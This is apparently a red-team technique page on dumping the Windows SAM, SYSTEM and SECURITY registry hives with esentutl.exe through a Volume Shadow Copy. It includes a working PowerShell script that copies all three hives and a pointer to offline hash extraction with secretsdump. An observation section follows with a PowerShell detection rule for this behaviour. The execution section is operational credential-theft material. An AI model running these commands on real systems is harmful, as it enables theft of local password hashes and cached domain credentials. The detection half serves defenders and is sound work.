Dumping SAM via esentutl.exe

Execution

esentutl.exe ships with every Windows install and can read a file through a Volume Shadow Copy (/vss), which sidesteps the lock the kernel holds on the live registry hives. From an elevated prompt it can therefore copy the SAM hive (and, with the same command, the SECURITY and SYSTEM hives; SYSTEM holds the boot key that is needed to decrypt the hashes in SAM) to a writable location:

esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam
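The same technique carried through for all three hives, as an added example (not code from the original page): it runs the page's esentutl command once per hive, then checks that each copy begins with the 'regf' registry-hive magic so a silently failed copy is noticed. The destination folder C:\temp\hives is an assumption; an elevated (local admin) shell is required for /vss.

```powershell
# Added example: copy SAM, SYSTEM and SECURITY out of a Volume Shadow Copy with
# esentutl.exe. Needs a high-integrity shell. Destination folder is an assumption.
$dest = 'C:\temp\hives'
New-Item -ItemType Directory -Path $dest -Force | Out-Null

# SAM   = local account NT hashes (encrypted with the boot key)
# SYSTEM = boot key needed to decrypt SAM, plus machine secrets
# SECURITY = LSA secrets and cached domain credentials
$hives = 'SAM', 'SYSTEM', 'SECURITY'

foreach ($h in $hives) {
    $src = "C:\Windows\System32\config\$h"
    $out = Join-Path $dest $h
    # /y = copy file, /vss = read the source from a shadow copy so the live lock
    # does not matter, /d = destination path
    & esentutl.exe /y /vss $src /d $out
    if ($LASTEXITCODE -ne 0) {
        Write-Warning "esentutl.exe failed for $h (exit code $LASTEXITCODE)"
    }
}

# Sanity check: a registry hive starts with the ASCII magic 'regf'. A missing,
# empty or non-'regf' file means the copy did not succeed.
foreach ($h in $hives) {
    $f = Join-Path $dest $h
    if (-not (Test-Path $f)) { Write-Warning "$h was not written"; continue }
    $fs  = [System.IO.File]::OpenRead($f)
    $buf = New-Object byte[] 4
    $null = $fs.Read($buf, 0, 4)
    $fs.Close()
    $magic = [System.Text.Encoding]::ASCII.GetString($buf)
    $state = if ($magic -eq 'regf') { 'ok' } else { 'BAD MAGIC' }
    '{0,-9} {1,10} bytes  magic={2}  {3}' -f $h, (Get-Item $f).Length, $magic, $state
}
```

The three files can then be parsed offline on another host, for example with impacket's secretsdump.py (-sam SAM -system SYSTEM -security SECURITY LOCAL); without SYSTEM the hashes in SAM cannot be decrypted.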

Observation

Below are some potential IOCs for detecting this technique:
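One way to turn the command line shown above into a detection, as an added example (not from the original page): it assumes process-creation telemetry that records the image path and full command line (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled), and alerts when esentutl.exe is invoked with /vss against one of the hives under System32\config. The sample records are constructed for the example.

```powershell
# Added example: flag esentutl.exe /vss reads of SAM, SECURITY or SYSTEM in
# process-creation telemetry. Sample events are constructed, not real logs.
$events = @(
    @{ Image = 'C:\Windows\System32\esentutl.exe'
       CommandLine = 'esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam' },
    @{ Image = 'C:\Windows\System32\esentutl.exe'
       CommandLine = 'esentutl.exe /y /vss C:\Windows\System32\config\SYSTEM /d c:\temp\system' },
    # legitimate ESE maintenance: no /vss, not a registry hive
    @{ Image = 'C:\Windows\System32\esentutl.exe'
       CommandLine = 'esentutl.exe /p C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb' },
    # same target, different tool: out of scope for this rule
    @{ Image = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'cmd.exe /c copy C:\Windows\System32\config\SAM c:\temp\sam' }
)

function Test-EsentutlHiveDump {
    param([hashtable]$Event)
    # match on the file name only so a non-standard parent path still triggers
    $isEsentutl = [System.IO.Path]::GetFileName($Event.Image) -ieq 'esentutl.exe'
    # /vss as a standalone switch anywhere on the command line
    $usesVss    = $Event.CommandLine -match '(?i)(^|\s)/vss(\s|$)'
    # source argument is one of the hives under System32\config
    $hiveTarget = $Event.CommandLine -match '(?i)\\config\\(SAM|SECURITY|SYSTEM)(\s|$)'
    return ($isEsentutl -and $usesVss -and $hiveTarget)
}

foreach ($e in $events) {
    $verdict = if (Test-EsentutlHiveDump $e) { 'ALERT' } else { 'ok   ' }
    "$verdict  $($e.CommandLine)"
}
```

Matching on the image file name means a renamed copy of the binary is missed; with Sysmon, also comparing the OriginalFileName field against esentutl.exe closes that gap. Expect a small amount of noise from administrators repairing ESE databases with esentutl, which the /vss and \config\ conditions are meant to exclude.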
